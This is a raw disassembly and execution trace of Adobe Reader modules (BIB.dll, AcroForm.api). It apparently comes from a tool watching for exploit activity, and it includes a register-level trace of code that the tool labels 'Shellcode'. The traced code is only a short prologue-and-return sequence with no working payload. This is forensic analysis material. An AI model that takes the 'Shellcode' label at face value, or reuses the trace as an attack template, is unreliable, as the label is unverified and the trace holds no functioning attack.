0x0700126E::BIB.dll 8B C6 mov eax, esi
0x07001270::BIB.dll 5E pop esi
0x07001271::BIB.dll 5B pop ebx
0x07001272::BIB.dll C3 ret
0x0700126D::BIB.dll 5F pop edi
0x0700126E::BIB.dll 8B C6 mov eax, esi
0x07001270::BIB.dll 5E pop esi
0x07001271::BIB.dll 5B pop ebx
0x07001272::BIB.dll C3 ret
0x0700121A::BIB.dll 89 07 mov dword ptr [edi], eax
0x0700121C::BIB.dll 59 pop ecx
0x0700121D::BIB.dll 59 pop ecx
0x0700121E::BIB.dll 8B 4E 08 mov ecx, dword ptr [esi+0x8]
0x07001221::BIB.dll 89 48 08 mov dword ptr [eax+0x8], ecx
0x07001224::BIB.dll 8B 07 mov eax, dword ptr [edi]
0x07001226::BIB.dll 8B 0E mov ecx, dword ptr [esi]
0x07001228::BIB.dll 89 08 mov dword ptr [eax], ecx
0x0700122A::BIB.dll 8B 06 mov eax, dword ptr [esi]
0x0700122C::BIB.dll 8B 0F mov ecx, dword ptr [edi]
0x0700122E::BIB.dll 89 48 08 mov dword ptr [eax+0x8], ecx
0x07001231::BIB.dll 8B 0B mov ecx, dword ptr [ebx]
0x07001233::BIB.dll 8B 07 mov eax, dword ptr [edi]
0x07001235::BIB.dll 89 48 04 mov dword ptr [eax+0x4], ecx
0x07001238::BIB.dll 8B 1B mov ebx, dword ptr [ebx]
0x0700123A::BIB.dll 85 DB test ebx, ebx
0x0700123C::BIB.dll 74 23 jz 0x7001261
0x0700123E::BIB.dll 8B 07 mov eax, dword ptr [edi]
0x07001240::BIB.dll 89 43 08 mov dword ptr [ebx+0x8], eax
0x07001243::BIB.dll EB 1C jmp 0x7001261
0x07001261::BIB.dll 8B 3F mov edi, dword ptr [edi]
0x07001263::BIB.dll 85 FF test edi, edi
0x07001265::BIB.dll 74 06 jz 0x700126d
0x07001267::BIB.dll 8B 46 0C mov eax, dword ptr [esi+0xc]
0x0700126A::BIB.dll 89 47 0C mov dword ptr [edi+0xc], eax
0x0700126D::BIB.dll 5F pop edi
0x0700126E::BIB.dll 8B C6 mov eax, esi
0x07001270::BIB.dll 5E pop esi
0x07001271::BIB.dll 5B pop ebx
0x07001272::BIB.dll C3 ret
0x07001393::BIB.dll 59 pop ecx
0x07001394::BIB.dll EB 02 jmp 0x7001398
0x07001398::BIB.dll C9 leave
0x07001399::BIB.dll C2 04 00 ret 0x4
0x070013A5::BIB.dll 85 C0 test eax, eax
0x070013A7::BIB.dll 74 09 jz 0x70013b2
0x070013A9::BIB.dll 6A 01 push 0x1
0x070013AB::BIB.dll 8B C8 mov ecx, eax
0x070013AD::BIB.dll E8 B6 FD FF FF call 0x7001168 -> .text
0x07001168::BIB.dll 56 push esi
0x07001169::BIB.dll 8B F1 mov esi, ecx
0x0700116B::BIB.dll 8D 4E 14 lea ecx, ptr [esi+0x14]
0x0700116E::BIB.dll E8 C7 FF FF FF call 0x700113a -> .text
0x0700113A::BIB.dll 80 79 04 00 cmp byte ptr [ecx+0x4], 0x0
0x0700113E::BIB.dll 74 0C jz 0x700114c
0x07001140::BIB.dll FF 31 push dword ptr [ecx]
0x07001142::BIB.dll B9 98 8A 01 07 mov ecx, 0x7018a98
0x07001147::BIB.dll E8 CF FF FF FF call 0x700111b -> .text
0x0700114C::BIB.dll C3 ret
0x07001173::BIB.dll F6 44 24 08 01 test byte ptr [esp+0x8], 0x1
0x07001178::BIB.dll 74 0B jz 0x7001185
0x0700117A::BIB.dll 56 push esi
0x0700117B::BIB.dll B9 98 8A 01 07 mov ecx, 0x7018a98
0x07001180::BIB.dll E8 96 FF FF FF call 0x700111b -> .text
0x07001185::BIB.dll 8B C6 mov eax, esi
0x07001187::BIB.dll 5E pop esi
0x07001188::BIB.dll C2 04 00 ret 0x4
0x070013B2::BIB.dll C2 04 00 ret 0x4
0x070013E5::BIB.dll 56 push esi
0x070013E6::BIB.dll FF 15 04 00 01 07 call dword ptr [0x7010004]
0x070013EC::BIB.dll E8 D2 51 00 00 call 0x70065c3 -> BIBInitialize4
0x070013F1::BIB.dll C3 ret
0x07005A2E::BIB.dll 8B 4C 24 0C mov ecx, dword ptr [esp+0xc]
0x07005A32::BIB.dll 8B 15 58 88 01 07 mov edx, dword ptr [0x7018858]
0x07005A38::BIB.dll 89 0A mov dword ptr [edx], ecx
0x07005A3A::BIB.dll A1 58 88 01 07 mov eax, dword ptr [0x7018858]
0x07005A3F::BIB.dll 8B 08 mov ecx, dword ptr [eax]
0x07005A41::BIB.dll 83 C1 1C add ecx, 0x1c
0x07005A44::BIB.dll 89 4C 24 0C mov dword ptr [esp+0xc], ecx
0x07005A48::BIB.dll 8B 44 24 0C mov eax, dword ptr [esp+0xc]
0x07005A4C::BIB.dll F0 FF 00 lock inc dword ptr [eax]
0x07005A4F::BIB.dll A1 58 88 01 07 mov eax, dword ptr [0x7018858]
0x07005A54::BIB.dll 83 C0 04 add eax, 0x4
0x07005A57::BIB.dll 3D F0 8B 01 07 cmp eax, 0x7018bf0
0x07005A5C::BIB.dll A3 58 88 01 07 mov dword ptr [0x7018858], eax
0x07005A61::BIB.dll 72 0A jb 0x7005a6d
0x07005A63::BIB.dll C7 05 58 88 01 07 F0 8A 01 07 mov dword ptr [0x7018858], 0x7018af0
0x07005A6D::BIB.dll 83 C4 08 add esp, 0x8
0x07005A70::BIB.dll C3 ret
0x07001393::BIB.dll 59 pop ecx
0x07001394::BIB.dll EB 02 jmp 0x7001398
0x0700409E::BIB.dll 8B 44 24 04 mov eax, dword ptr [esp+0x4]
0x070040A2::BIB.dll 8B 40 08 mov eax, dword ptr [eax+0x8]
0x070040A5::BIB.dll C3 ret
0x07004318::BIB.dll 8B 4C 24 04 mov ecx, dword ptr [esp+0x4]
0x0700431C::BIB.dll E9 C1 FF FF FF jmp 0x70042e2
0x07001F37::BIB.dll 6A 04 push 0x4
0x07001F39::BIB.dll B8 20 E0 00 07 mov eax, 0x700e020
0x07001F3E::BIB.dll E8 4A 46 00 00 call 0x700658d -> BIBInitialize4
0x07001F43::BIB.dll 83 65 FC 00 and dword ptr [ebp-0x4], 0x0
0x07001F47::BIB.dll E8 74 FE FF FF call 0x7001dc0 -> .text
0x07001DC0::BIB.dll 56 push esi
0x07001DC1::BIB.dll 57 push edi
0x07001DC2::BIB.dll 6A 44 push 0x44
0x07001DC4::BIB.dll B9 98 8A 01 07 mov ecx, 0x7018a98
0x07001DC9::BIB.dll E8 0F F7 FF FF call 0x70014dd -> .text
0x07001DCE::BIB.dll BF 34 89 01 07 mov edi, 0x7018934
0x07001DD3::BIB.dll 57 push edi
0x07001DD4::BIB.dll 8B F0 mov esi, eax
0x07001DD6::BIB.dll FF 15 00 00 01 07 call dword ptr [0x7010000]
0x07001DDC::BIB.dll 85 F6 test esi, esi
0x07001DDE::BIB.dll 74 0B jz 0x7001deb
0x07001DE0::BIB.dll 8B CE mov ecx, esi
0x07001DE2::BIB.dll E8 F9 FD FF FF call 0x7001be0 -> .text
0x07001BE0::BIB.dll 56 push esi
0x07001BE1::BIB.dll 57 push edi
0x07001BE2::BIB.dll 33 FF xor edi, edi
0x07001BE4::BIB.dll 57 push edi
0x07001BE5::BIB.dll 68 1C 89 01 07 push 0x701891c
0x07001BEA::BIB.dll 8B F1 mov esi, ecx
0x07001BEC::BIB.dll E8 DD FD FF FF call 0x70019ce -> .text
0x070019CE::BIB.dll 33 C0 xor eax, eax
0x070019D0::BIB.dll 56 push esi
0x070019D1::BIB.dll FF 74 24 0C push dword ptr [esp+0xc]
0x070019D5::BIB.dll 8B F1 mov esi, ecx
0x070019D7::BIB.dll 89 46 04 mov dword ptr [esi+0x4], eax
0x070019DA::BIB.dll 89 46 08 mov dword ptr [esi+0x8], eax
0x070019DD::BIB.dll 89 46 0C mov dword ptr [esi+0xc], eax
0x070019E0::BIB.dll 89 46 10 mov dword ptr [esi+0x10], eax
0x070019E3::BIB.dll 8B 44 24 0C mov eax, dword ptr [esp+0xc]
0x070019E7::BIB.dll C7 06 54 05 01 07 mov dword ptr [esi], 0x7010554
0x070019ED::BIB.dll 89 46 1C mov dword ptr [esi+0x1c], eax
0x070019F0::BIB.dll E8 FA FD FF FF call 0x70017ef -> .text
0x070017EF::BIB.dll 80 7C 24 04 00 cmp byte ptr [esp+0x4], 0x0
0x070017F4::BIB.dll 74 2A jz 0x7001820
0x070017F6::BIB.dll 56 push esi
0x070017F7::BIB.dll 8B 71 1C mov esi, dword ptr [ecx+0x1c]
0x070017FA::BIB.dll 8B 06 mov eax, dword ptr [esi]
0x070017FC::BIB.dll 85 C0 test eax, eax
0x070017FE::BIB.dll 74 0B jz 0x700180b
0x07001800::BIB.dll EB 02 jmp 0x7001804
0x07001820::BIB.dll 8B 41 1C mov eax, dword ptr [ecx+0x1c]
0x07001823::BIB.dll 8B 00 mov eax, dword ptr [eax]
0x07001825::BIB.dll 85 C0 test eax, eax
0x07001827::BIB.dll 89 41 14 mov dword ptr [ecx+0x14], eax
0x0700182A::BIB.dll 74 03 jz 0x700182f
0x0700182C::BIB.dll 89 48 18 mov dword ptr [eax+0x18], ecx
0x0700182F::BIB.dll 8B 41 1C mov eax, dword ptr [ecx+0x1c]
0x07001832::BIB.dll 83 61 18 00 and dword ptr [ecx+0x18], 0x0
0x07001836::BIB.dll 89 08 mov dword ptr [eax], ecx
0x07001838::BIB.dll 8B 49 1C mov ecx, dword ptr [ecx+0x1c]
0x0700183B::BIB.dll FF 41 04 inc dword ptr [ecx+0x4]
0x0700183E::BIB.dll C2 04 00 ret 0x4
0x0700182F::BIB.dll 8B 41 1C mov eax, dword ptr [ecx+0x1c]
0x07001832::BIB.dll 83 61 18 00 and dword ptr [ecx+0x18], 0x0
0x07001836::BIB.dll 89 08 mov dword ptr [eax], ecx
0x07001838::BIB.dll 8B 49 1C mov ecx, dword ptr [ecx+0x1c]
0x0700183B::BIB.dll FF 41 04 inc dword ptr [ecx+0x4]
0x0700183E::BIB.dll C2 04 00 ret 0x4
0x070019F5::BIB.dll 8B C6 mov eax, esi
0x070019F7::BIB.dll 5E pop esi
0x070019F8::BIB.dll C2 08 00 ret 0x8
0x07001BF1::BIB.dll 89 7E 24 mov dword ptr [esi+0x24], edi
0x07001BF4::BIB.dll 89 7E 28 mov dword ptr [esi+0x28], edi
0x07001BF7::BIB.dll 89 7E 2C mov dword ptr [esi+0x2c], edi
0x07001BFA::BIB.dll 89 7E 34 mov dword ptr [esi+0x34], edi
0x07001BFD::BIB.dll 5F pop edi
0x07001BFE::BIB.dll C7 06 64 05 01 07 mov dword ptr [esi], 0x7010564
0x07001C04::BIB.dll C7 46 38 01 00 00 00 mov dword ptr [esi+0x38], 0x1
0x07001C0B::BIB.dll 8B C6 mov eax, esi
0x07001C0D::BIB.dll 5E pop esi
0x07001C0E::BIB.dll C3 ret
0x07001DE7::BIB.dll 8B F0 mov esi, eax
0x07001DE9::BIB.dll EB 02 jmp 0x7001ded
0x07001DED::BIB.dll 57 push edi
0x07001DEE::BIB.dll FF 15 04 00 01 07 call dword ptr [0x7010004]
0x07001DF4::BIB.dll 5F pop edi
0x07001DF5::BIB.dll 8B C6 mov eax, esi
0x07001DF7::BIB.dll 5E pop esi
0x07001DF8::BIB.dll C3 ret
0x07001F4C::BIB.dll EB 08 jmp 0x7001f56
0x07001F56::BIB.dll E8 68 46 00 00 call 0x70065c3 -> BIBInitialize4
0x07001F5B::BIB.dll C3 ret
0x0700456B::BIB.dll 6A 04 push 0x4
0x0700456D::BIB.dll B8 6E EB 00 07 mov eax, 0x700eb6e
0x07004572::BIB.dll E8 16 20 00 00 call 0x700658d -> BIBInitialize4
0x07004577::BIB.dll FF 75 08 push dword ptr [ebp+0x8]
0x0700457A::BIB.dll 83 65 FC 00 and dword ptr [ebp-0x4], 0x0
0x0700457E::BIB.dll B9 98 8A 01 07 mov ecx, 0x7018a98
0x07004583::BIB.dll E8 93 CB FF FF call 0x700111b -> .text
0x07004588::BIB.dll E8 36 20 00 00 call 0x70065c3 -> BIBInitialize4
0x0700458D::BIB.dll C3 ret
0x07002BCC::BIB.dll 56 push esi
0x07002BCD::BIB.dll FF 74 24 0C push dword ptr [esp+0xc]
0x07002BD1::BIB.dll 8B F1 mov esi, ecx
0x07002BD3::BIB.dll 8D 4E 10 lea ecx, ptr [esi+0x10]
0x07002BD6::BIB.dll E8 8D FE FF FF call 0x7002a68 -> .text
0x07002A68::BIB.dll 55 push ebp
0x07002A69::BIB.dll 8B EC mov ebp, esp
0x07002A6B::BIB.dll 56 push esi
0x07002A6C::BIB.dll 8B F1 mov esi, ecx
0x07002A6E::BIB.dll 8B 0E mov ecx, dword ptr [esi]
0x07002A70::BIB.dll 57 push edi
0x07002A71::BIB.dll 8B 7D 08 mov edi, dword ptr [ebp+0x8]
0x07002A74::BIB.dll 3B F9 cmp edi, ecx
0x07002A76::BIB.dll 74 1B jz 0x7002a93
0x07002A78::BIB.dll 85 C9 test ecx, ecx
0x07002A7A::BIB.dll 74 05 jz 0x7002a81
0x07002A7C::BIB.dll E8 71 E9 FF FF call 0x70013f2 -> .text
0x07002A81::BIB.dll 85 FF test edi, edi
0x07002A83::BIB.dll 89 3E mov dword ptr [esi], edi
0x07002A85::BIB.dll 74 0C jz 0x7002a93
0x07002A87::BIB.dll 83 C7 1C add edi, 0x1c
0x07002A8A::BIB.dll 89 7D 08 mov dword ptr [ebp+0x8], edi
0x07002A8D::BIB.dll 8B 45 08 mov eax, dword ptr [ebp+0x8]
0x07002A90::BIB.dll F0 FF 00 lock inc dword ptr [eax]
0x07002A93::BIB.dll 5F pop edi
0x07002A94::BIB.dll 5E pop esi
0x07002A95::BIB.dll 5D pop ebp
0x07002A96::BIB.dll C2 04 00 ret 0x4
0x07002BDB::BIB.dll 8B 44 24 10 mov eax, dword ptr [esp+0x10]
0x07002BDF::BIB.dll 89 46 14 mov dword ptr [esi+0x14], eax
0x07002BE2::BIB.dll 8B 44 24 08 mov eax, dword ptr [esp+0x8]
0x07002BE6::BIB.dll 89 46 18 mov dword ptr [esi+0x18], eax
0x07002BE9::BIB.dll 5E pop esi
0x07002BEA::BIB.dll C2 0C 00 ret 0xc
0x07003209::BIB.dll 8B 0E mov ecx, dword ptr [esi]
0x0700320B::BIB.dll 8B 7D 18 mov edi, dword ptr [ebp+0x18]
0x0700320E::BIB.dll 57 push edi
0x0700320F::BIB.dll 83 C1 10 add ecx, 0x10
0x07003212::BIB.dll E8 51 F8 FF FF call 0x7002a68 -> .text
0x07003217::BIB.dll 57 push edi
0x07003218::BIB.dll 8D 4E 10 lea ecx, ptr [esi+0x10]
0x0700321B::BIB.dll E8 48 F8 FF FF call 0x7002a68 -> .text
0x07003220::BIB.dll 8B 43 14 mov eax, dword ptr [ebx+0x14]
0x07003223::BIB.dll 89 46 24 mov dword ptr [esi+0x24], eax
0x07003226::BIB.dll 8B 47 14 mov eax, dword ptr [edi+0x14]
0x07003229::BIB.dll 89 46 28 mov dword ptr [esi+0x28], eax
0x0700322C::BIB.dll 8B 45 0C mov eax, dword ptr [ebp+0xc]
0x0700322F::BIB.dll 89 46 2C mov dword ptr [esi+0x2c], eax
0x07003232::BIB.dll 8B 45 1C mov eax, dword ptr [ebp+0x1c]
0x07003235::BIB.dll 89 46 18 mov dword ptr [esi+0x18], eax
0x07003238::BIB.dll 8B 45 20 mov eax, dword ptr [ebp+0x20]
0x0700323B::BIB.dll 89 46 1C mov dword ptr [esi+0x1c], eax
0x0700323E::BIB.dll 8B 45 24 mov eax, dword ptr [ebp+0x24]
0x07003241::BIB.dll 89 46 20 mov dword ptr [esi+0x20], eax
0x07003244::BIB.dll 8B 45 08 mov eax, dword ptr [ebp+0x8]
0x07003247::BIB.dll 5F pop edi
0x07003248::BIB.dll 89 30 mov dword ptr [eax], esi
0x0700324A::BIB.dll 5B pop ebx
0x0700324B::BIB.dll 33 C0 xor eax, eax
0x0700324D::BIB.dll 5E pop esi
0x0700324E::BIB.dll 5D pop ebp
0x0700324F::BIB.dll C3 ret
0x07002E8E::BIB.dll 85 C0 test eax, eax
0x07002E90::BIB.dll 74 10 jz 0x7002ea2
0x07002E92::BIB.dll FF 74 24 08 push dword ptr [esp+0x8]
0x07002E96::BIB.dll 8B C8 mov ecx, eax
0x07002E98::BIB.dll FF 74 24 08 push dword ptr [esp+0x8]
0x07002E9C::BIB.dll E8 60 FC FF FF call 0x7002b01 -> .text
0x07002EAF::BIB.dll 85 C0 test eax, eax
0x07002EB1::BIB.dll 74 18 jz 0x7002ecb
0x07002EB3::BIB.dll FF 74 24 10 push dword ptr [esp+0x10]
0x07002EB7::BIB.dll 8B C8 mov ecx, eax
0x07002EB9::BIB.dll FF 74 24 10 push dword ptr [esp+0x10]
0x07002EBD::BIB.dll FF 74 24 10 push dword ptr [esp+0x10]
0x07002EC1::BIB.dll FF 74 24 10 push dword ptr [esp+0x10]
0x07002EC5::BIB.dll E8 23 FD FF FF call 0x7002bed -> .text
0x070024AA::BIB.dll 59 pop ecx
0x070024AB::BIB.dll 59 pop ecx
0x070024AC::BIB.dll 59 pop ecx
0x070024AD::BIB.dll C3 ret
0x070024CC::BIB.dll 33 C0 xor eax, eax
0x070024CE::BIB.dll 40 inc eax
0x070024CF::BIB.dll C3 ret
0x07002FBB::BIB.dll 59 pop ecx
0x07002FBC::BIB.dll 85 C0 test eax, eax
0x07002FBE::BIB.dll 59 pop ecx
0x07002FBF::BIB.dll 0F 95 C0 setnz al
0x07002FC2::BIB.dll EB 13 jmp 0x7002fd7
0x07002FD7::BIB.dll 80 7D 08 00 cmp byte ptr [ebp+0x8], 0x0
0x07002FDB::BIB.dll 74 24 jz 0x7003001
0x07002FDD::BIB.dll 84 C0 test al, al
0x07002FDF::BIB.dll 74 20 jz 0x7003001
0x07002FE1::BIB.dll 8B 56 18 mov edx, dword ptr [esi+0x18]
0x07002FE4::BIB.dll 85 D2 test edx, edx
0x07002FE6::BIB.dll 74 12 jz 0x7002ffa

Shellcode:
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 541f0790 esp = 4b5fc14 ebp = 4b5fc30 eflags = 246
0x541F0790:: 55 push ebp
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 541f0791 esp = 4b5fc10 ebp = 4b5fc30 eflags = 246
0x541F0791:: 8B EC mov ebp, esp
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 541f0793 esp = 4b5fc10 ebp = 4b5fc10 eflags = 246
0x541F0793:: 56 push esi
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 541f0794 esp = 4b5fc0c ebp = 4b5fc10 eflags = 246
0x541F0794:: 8B 75 10 mov esi, dword ptr [ebp+0x10]
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 0 edi = 0
eip = 541f0797 esp = 4b5fc0c ebp = 4b5fc10 eflags = 246
0x541F0797:: 57 push edi
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 0 edi = 0
eip = 541f0798 esp = 4b5fc08 ebp = 4b5fc10 eflags = 246
0x541F0798:: 8B 7D 0C mov edi, dword ptr [ebp+0xc]
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 0 edi = 2
eip = 541f079b esp = 4b5fc08 ebp = 4b5fc10 eflags = 246
0x541F079B:: 83 FF 01 cmp edi, 0x1
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 0 edi = 2
eip = 541f079e esp = 4b5fc08 ebp = 4b5fc10 eflags = 202
0x541F079E:: 75 19 jnz 0x541f07b9
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 0 edi = 2
eip = 541f07b9 esp = 4b5fc08 ebp = 4b5fc10 eflags = 202
0x541F07B9:: 83 FF 02 cmp edi, 0x2
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 0 edi = 2
eip = 541f07bc esp = 4b5fc08 ebp = 4b5fc10 eflags = 246
0x541F07BC:: 74 1E jz 0x541f07dc
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 0 edi = 2
eip = 541f07dc esp = 4b5fc08 ebp = 4b5fc10 eflags = 246
0x541F07DC:: 80 3D 3C 8B 48 54 00 cmp byte ptr [0x54488b3c], 0x0
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 0 edi = 2
eip = 541f07e3 esp = 4b5fc08 ebp = 4b5fc10 eflags = 202
0x541F07E3:: 75 56 jnz 0x541f083b
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 0 edi = 2
eip = 541f083b esp = 4b5fc08 ebp = 4b5fc10 eflags = 202
0x541F083B:: 5F pop edi
eax = 4b5fc54 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 0 edi = 0
eip = 541f083c esp = 4b5fc0c ebp = 4b5fc10 eflags = 202
0x541F083C:: B0 01 mov al, 0x1
eax = 4b5fc01 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 0 edi = 0
eip = 541f083e esp = 4b5fc0c ebp = 4b5fc10 eflags = 202
0x541F083E:: 5E pop esi
eax = 4b5fc01 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 541f083f esp = 4b5fc10 ebp = 4b5fc10 eflags = 202
0x541F083F:: 5D pop ebp
eax = 4b5fc01 ebx = 7ffd5000 ecx = 541f0790 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 541f0840 esp = 4b5fc14 ebp = 4b5fc30 eflags = 202
0x541F0840:: C2 0C 00 ret 0xc
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 5500bfc0 esp = 4b5fc14 ebp = 4b5fc30 eflags = 246
0x5500BFC0:: 55 push ebp
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 5500bfc1 esp = 4b5fc10 ebp = 4b5fc30 eflags = 246
0x5500BFC1:: 8B EC mov ebp, esp
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 5500bfc3 esp = 4b5fc10 ebp = 4b5fc10 eflags = 246
0x5500BFC3:: 56 push esi
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 5500bfc4 esp = 4b5fc0c ebp = 4b5fc10 eflags = 246
0x5500BFC4:: 8B 75 10 mov esi, dword ptr [ebp+0x10]
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 0 edi = 0
eip = 5500bfc7 esp = 4b5fc0c ebp = 4b5fc10 eflags = 246
0x5500BFC7:: 57 push edi
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 0 edi = 0
eip = 5500bfc8 esp = 4b5fc08 ebp = 4b5fc10 eflags = 246
0x5500BFC8:: 8B 7D 0C mov edi, dword ptr [ebp+0xc]
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 0 edi = 2
eip = 5500bfcb esp = 4b5fc08 ebp = 4b5fc10 eflags = 246
0x5500BFCB:: 83 FF 01 cmp edi, 0x1
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 0 edi = 2
eip = 5500bfce esp = 4b5fc08 ebp = 4b5fc10 eflags = 202
0x5500BFCE:: 75 19 jnz 0x5500bfe9
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 0 edi = 2
eip = 5500bfe9 esp = 4b5fc08 ebp = 4b5fc10 eflags = 202
0x5500BFE9:: 83 FF 02 cmp edi, 0x2
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 0 edi = 2
eip = 5500bfec esp = 4b5fc08 ebp = 4b5fc10 eflags = 246
0x5500BFEC:: 74 1E jz 0x5500c00c
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 0 edi = 2
eip = 5500c00c esp = 4b5fc08 ebp = 4b5fc10 eflags = 246
0x5500C00C:: 80 3D 78 A6 1D 55 00 cmp byte ptr [0x551da678], 0x0
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 0 edi = 2
eip = 5500c013 esp = 4b5fc08 ebp = 4b5fc10 eflags = 202
0x5500C013:: 75 56 jnz 0x5500c06b
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 0 edi = 2
eip = 5500c06b esp = 4b5fc08 ebp = 4b5fc10 eflags = 202
0x5500C06B:: 5F pop edi
eax = 4b5fc54 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 0 edi = 0
eip = 5500c06c esp = 4b5fc0c ebp = 4b5fc10 eflags = 202
0x5500C06C:: B0 01 mov al, 0x1
eax = 4b5fc01 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 0 edi = 0
eip = 5500c06e esp = 4b5fc0c ebp = 4b5fc10 eflags = 202
0x5500C06E:: 5E pop esi
eax = 4b5fc01 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 5500c06f esp = 4b5fc10 ebp = 4b5fc10 eflags = 202
0x5500C06F:: 5D pop ebp
eax = 4b5fc01 ebx = 7ffd5000 ecx = 5500bfc0 edx = 80084004 esi = 4b5fc24 edi = 0
eip = 5500c070 esp = 4b5fc14 ebp = 4b5fc30 eflags = 202
0x5500C070:: C2 0C 00 ret 0xc

Executed before
0x20C9CCCB::AcroForm.api 75 18 jnz 0x20c9cce5
0x20C9CCCD::AcroForm.api 66 F7 43 0C 00 04 test word ptr [ebx+0xc], 0x400
0x20C9CCD3::AcroForm.api B8 7C AB D9 20 mov eax, 0x20d9ab7c
0x20C9CCD8::AcroForm.api 75 05 jnz 0x20c9ccdf
0x20C9CCC4::AcroForm.api F7 43 20 00 00 00 02 test dword ptr [ebx+0x20], 0x2000000
0x20C9CCCB::AcroForm.api 75 18 jnz 0x20c9cce5
0x20C9CCCD::AcroForm.api 66 F7 43 0C 00 04 test word ptr [ebx+0xc], 0x400
0x20C9CCD3::AcroForm.api B8 7C AB D9 20 mov eax, 0x20d9ab7c
0x20C9CCD8::AcroForm.api 75 05 jnz 0x20c9ccdf
0x20C9CCDA::AcroForm.api B8 38 AD D9 20 mov eax, 0x20d9ad38
0x20C9CCDF::AcroForm.api 50 push eax
0x20C9CCE0::AcroForm.api E9 3C FF FF FF jmp 0x20c9cc21
0x20C9CCE5::AcroForm.api 0F B7 45 F8 movzx eax, word ptr [ebp-0x8]
0x20C9CCE9::AcroForm.api 8B 7D F4 mov edi, dword ptr [ebp-0xc]
0x20C9CCEC::AcroForm.api 89 45 EC mov dword ptr [ebp-0x14], eax
0x20C9CCEF::AcroForm.api 85 C0 test eax, eax
0x20C9CCF1::AcroForm.api E9 12 03 00 00 jmp 0x20c9d008
0x20C9D008::AcroForm.api 89 7D F0 mov dword ptr [ebp-0x10], edi
0x20C9D00B::AcroForm.api 0F 8F E5 FC FF FF jnle 0x20c9ccf6
0x20C9D011::AcroForm.api 66 83 7B 52 03 cmp word ptr [ebx+0x52], 0x3
0x20C9D016::AcroForm.api 75 13 jnz 0x20c9d02b
0x20C9D018::AcroForm.api F7 43 20 00 00 00 04 test dword ptr [ebx+0x20], 0x4000000
0x20C9D01F::AcroForm.api 75 0A jnz 0x20c9d02b
0x20C9CCF6::AcroForm.api 0F B7 17 movzx edx, word ptr [edi]
0x20C9CCF9::AcroForm.api 66 85 D2 test dx, dx
0x20C9CCFC::AcroForm.api 0F 84 FC 02 00 00 jz 0x20c9cffe
0x20C9CD02::AcroForm.api 0F B7 F2 movzx esi, dx
0x20C9CD05::AcroForm.api B8 41 01 00 00 mov eax, 0x141
0x20C9CD0A::AcroForm.api 3B F0 cmp esi, eax
0x20C9CD0C::AcroForm.api 0F 8F 95 01 00 00 jnle 0x20c9cea7
0x20C9CD12::AcroForm.api 0F 84 D9 02 00 00 jz 0x20c9cff1
0x20C9CFFE::AcroForm.api FF 4D EC dec dword ptr [ebp-0x14]
0x20C9D001::AcroForm.api 83 C7 0C add edi, 0xc
0x20C9D004::AcroForm.api 83 7D EC 00 cmp dword ptr [ebp-0x14], 0x0
0x20C9D008::AcroForm.api 89 7D F0 mov dword ptr [ebp-0x10], edi
0x20C9D00B::AcroForm.api 0F 8F E5 FC FF FF jnle 0x20c9ccf6
0x20C9D011::AcroForm.api 66 83 7B 52 03 cmp word ptr [ebx+0x52], 0x3
0x20C9D016::AcroForm.api 75 13 jnz 0x20c9d02b
0x20C9D018::AcroForm.api F7 43 20 00 00 00 04 test dword ptr [ebx+0x20], 0x4000000
0x20C9D01F::AcroForm.api 75 0A jnz 0x20c9d02b
0x20C9CD18::AcroForm.api 81 FE 19 01 00 00 cmp esi, 0x119
0x20C9CD1E::AcroForm.api 0F 8F C4 00 00 00 jnle 0x20c9cde8
0x20C9CD24::AcroForm.api 81 FE 18 01 00 00 cmp esi, 0x118
0x20C9CD2A::AcroForm.api 0F 8D 0F 02 00 00 jnl 0x20c9cf3f
0x20C9CD30::AcroForm.api 8B C6 mov eax, esi
